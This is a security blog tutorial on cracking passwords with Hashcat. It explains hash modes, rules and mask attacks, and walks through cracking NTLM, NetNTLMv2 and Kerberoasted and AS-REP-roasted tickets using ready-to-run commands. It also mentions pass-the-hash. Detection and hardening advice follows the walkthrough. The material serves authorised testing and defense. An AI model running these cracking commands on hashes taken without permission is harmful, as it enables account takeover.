Password Cracking with Hashcat: Modes, Rules, Masks, and Cracking NTLM & Kerberos

Tools & Defense
2025.12.23
Time it takes to read this article 6 minutes.

Legal & ethical disclaimer. This article is for education and authorized security testing only. Crack only hashes from systems you own or have explicit, written permission to test. Unauthorized password cracking violates the Computer Fraud and Abuse Act (US), the Computer Misuse Act (UK), and equivalent laws worldwide. You are responsible for your actions.

Introduction / Overview

Hashcat is the de facto standard offline password recovery tool. Once you have captured a hash — from a database dump, a secretsdump of NTDS.dit, a Kerberoast, or an AS-REP roast — Hashcat turns your GPU into a brute-force engine that tries billions of candidate passwords per second against that hash.

In this article you'll learn the four things that make Hashcat effective: choosing the correct hash mode (-m), the attack mode (-a), wordlists combined with rules, and mask attacks for structured brute force. We'll finish with two of the most common Active Directory targets — NTLM and Kerberos — and then weigh in with detection and defense so blue teams get equal treatment.

How it works / Background

Hashcat does not "reverse" a hash. It computes the hash of a candidate password and compares it to the target. A cryptographic hash is one-way, so cracking is a guessing game whose speed depends on the algorithm's cost.

Fast hashes (MD5, NTLM, SHA-1) have no salt and no iteration count, so a modern GPU computes tens to hundreds of billions per second. Slow hashes (bcrypt, Argon2, Kerberos with AES) are intentionally expensive, dropping throughput by orders of magnitude. That cost asymmetry is the entire reason slow hashes exist.

Two flags drive every run:

  • -m <mode>: the hash mode, a numeric ID identifying the algorithm. A few you must know:
    • 0 = MD5
    • 1000 = NTLM
    • 1800 = sha512crypt ($6$, Linux /etc/shadow)
    • 3200 = bcrypt ($2*$)
    • 5600 = NetNTLMv2 (captured SMB/HTTP challenge-response)
    • 13100 = Kerberos 5 TGS-REP etype 23 (RC4 Kerberoast)
    • 19600/19700 = Kerberos 5 TGS-REP etype 17/18 (AES128/AES256)
    • 18200 = Kerberos 5 AS-REP etype 23 (AS-REP roast)
  • -a <attack>: the attack mode.
    • -a 0 = straight (wordlist, optionally with rules)
    • -a 1 = combinator (concatenate two wordlists)
    • -a 3 = mask / brute force
    • -a 6 / -a 7 = hybrid wordlist + mask

Run hashcat --help | grep -i ntlm to find a mode, or hashcat --example-hashes -m 1000 to see the exact expected format.

Prerequisites / Lab setup

You need a GPU with current drivers (NVIDIA CUDA or AMD ROCm/OpenCL), Hashcat 6.x, and a benchmark to confirm acceleration is working:

# Confirm Hashcat sees your GPU and measure raw speed for NTLM
hashcat -b -m 1000

# Grab a battle-tested wordlist and a rule set
git clone https://github.com/danielmiessler/SecLists.git
# rockyou ships with most pentest distros:
ls /usr/share/wordlists/rockyou.txt
Bash

Throughout, rockyou.txt is our base wordlist and Hashcat's bundled rules (in /usr/share/hashcat/rules/ or the install's rules/ directory) supply mutations. Use --potfile-path to keep test cracks isolated, and --status --status-timer=10 for live progress.

Attack walkthrough / PoC

1. Straight wordlist attack

The simplest attack. Hash a candidate per wordlist line:

hashcat -m 1000 -a 0 hashes.txt rockyou.txt -O -w 3
Bash

-O enables optimized kernels (faster, but caps password length, typically to 31). -w 3 sets a high workload profile. Add --username if the file is in user:hash format from secretsdump.

2. Rules — getting more from a wordlist

Rules programmatically mutate each wordlist word: capitalize, append digits, leetspeak, duplicate, etc. This is the single highest-value technique because real users transform base words predictably (SummerSummer2025!).

# best64 is a great default; one word becomes ~64 candidates
hashcat -m 1000 -a 0 hashes.txt rockyou.txt -r rules/best64.rule

# Stack rules and use the aggressive OneRuleToRuleThemAll set
hashcat -m 1000 -a 0 hashes.txt rockyou.txt -r OneRuleToRuleThemAll.rule
Bash

A rule is a tiny language: c capitalizes, $1 $2 $3 appends 123, sa@ substitutes a@. So c sa@ $! turns password into P@ssword!. You can test rules on the fly with --stdout:

echo "password" | hashcat -r rules/best64.rule --stdout | head
Bash

3. Mask attack — structured brute force

A mask attack (-a 3) brute-forces a known pattern instead of all of keyspace. Charsets:

  • ?l = a-z, ?u = A-Z, ?d = 0-9, ?s = symbols, ?a = all, ?b = raw bytes.
# Exactly 8 chars: one uppercase, five lowercase, two digits — e.g. "Summer25"
hashcat -m 1000 -a 3 hashes.txt ?u?l?l?l?l?l?d?d

# Custom charset: -1 defines a set, then reference it as ?1
hashcat -m 1000 -a 3 hashes.txt -1 ?u?l ?1?l?l?l?l?l?d?d

# Incremental brute force up to 8 chars of any printable char
hashcat -m 1000 -a 3 --increment --increment-min 4 --increment-max 8 hashes.txt ?a?a?a?a?a?a?a?a
Bash

Hybrid attacks combine both: -a 6 rockyou.txt ?d?d?d?d appends four digits to every word; -a 7 ?d?d rockyou.txt prepends them.

4. Cracking NTLM

NTLM hashes are unsalted MD4 of the UTF-16LE password — extremely fast to crack. After dumping the domain database you'll have lines like Administrator:500:aad3b...:8846f7eaee8fb117ad06bdd830b7586c:::. Feed the file directly:

# secretsdump output: hashcat parses user:rid:lm:ntlm with --username
hashcat -m 1000 -a 0 --username ntds.txt rockyou.txt -r rules/best64.rule
Bash

That 8846f7eaee8fb117ad06bdd830b7586c is the NTLM of Password — a famous test value. Note: you can also pass-the-hash with the raw NTLM, no cracking required, which is exactly why NTLM is dangerous.

For NetNTLMv2 captured over the wire (e.g., with Responder), use -m 5600. These are challenge-response and cannot be passed-the-hash, but crack offline just fine:

hashcat -m 5600 -a 0 netntlmv2.txt rockyou.txt -r rules/best64.rule
Bash

5. Cracking Kerberos (Kerberoasting & AS-REP roasting)

Kerberoasting abuses that any domain user can request a service ticket (TGS-REP) for any account with an SPN; part of the ticket is encrypted with the service account's password-derived key. Crack it offline to recover that password.

# RC4 ticket (etype 23) -> $krb5tgs$23$...
hashcat -m 13100 -a 0 kerberoast.txt rockyou.txt -r rules/best64.rule

# AES256 ticket (etype 18) -> $krb5tgs$18$... (much slower)
hashcat -m 19700 -a 0 kerberoast_aes.txt rockyou.txt
Bash

AS-REP roasting targets accounts with Do not require Kerberos preauthentication set. The AS-REP is encrypted with the user's key, so it cracks just like a Kerberoast:

# $krb5asrep$23$user@DOMAIN:...
hashcat -m 18200 -a 0 asrep.txt rockyou.txt -r rules/best64.rule
Bash

See my deep dives on Kerberoasting and AS-REP Roasting for the request side with Impacket and Rubeus.

Authentication & cracking flow

Password Cracking with Hashcat: Modes, Rules, Masks, and Cracking NTLM & Kerberos diagram 1

The diagram shows a user requesting a Kerberos service ticket, extracting the encrypted blob, and cracking it offline with Hashcat to recover the service account password.

Detection & Defense (Blue Team)

Cracking is offline and invisible to the target, so defense focuses on preventing capture, raising hash cost, and detecting the request that precedes the crack.

  • Long, random passwords beat every attack here. A 15+ character random password makes wordlist+rule attacks fail and mask/brute-force computationally infeasible even for fast NTLM. Enforce length, not just complexity (NIST SP 800-63B).
  • Kill weak Kerberos encryption. Disable RC4 (etype 23) so Kerberoast tickets come back as AES (-m 19600/19700), which crack roughly 10x slower. Set msDS-SupportedEncryptionTypes to AES-only and audit accounts that still allow RC4.
  • Use Group Managed Service Accounts (gMSA) for SPN-bearing accounts. gMSA passwords are 120+ random characters rotated automatically — effectively uncrackable, neutralizing Kerberoasting (MITRE ATT&CK T1558.003).
  • Detect the roast request. Monitor Event ID 4769 (Kerberos service ticket requested) for a high volume of requests, especially Ticket Encryption Type 0x17 (RC4) from a single user. Alert on AS-REQ patterns and accounts with preauth disabled for AS-REP roasting (T1558.004).
  • Neutralize NTLM capture. Disable NTLM where possible, enable SMB signing and LDAP channel binding to defeat Responder/relay, and segment networks. Watch for Event ID 4624/4625 anomalies and rogue responders.
  • Protect the hash store. NTDS.dit extraction (T1003.003) requires DC access — restrict and monitor Domain Admin logons, volume shadow copies, and DCSync (Event ID 4662 with replication GUIDs).
  • Slow hashing for apps. For anything you control, store passwords with bcrypt/scrypt/Argon2id, never MD5/SHA-1/NTLM-equivalents. See Password Storage Hardening.

Conclusion

Hashcat's power comes from matching the right -m mode to your hash and the right -a attack to your knowledge of the target. Wordlists plus rules crack the human-chosen passwords; mask attacks finish off structured ones; NTLM and Kerberos hashes fall fast when RC4 and weak passwords are in play. For defenders the takeaway is symmetric: long random passwords, AES-only Kerberos, gMSA, and watching Event ID 4769 turn an easy crack into a dead end.

References

Comments

Copied title and URL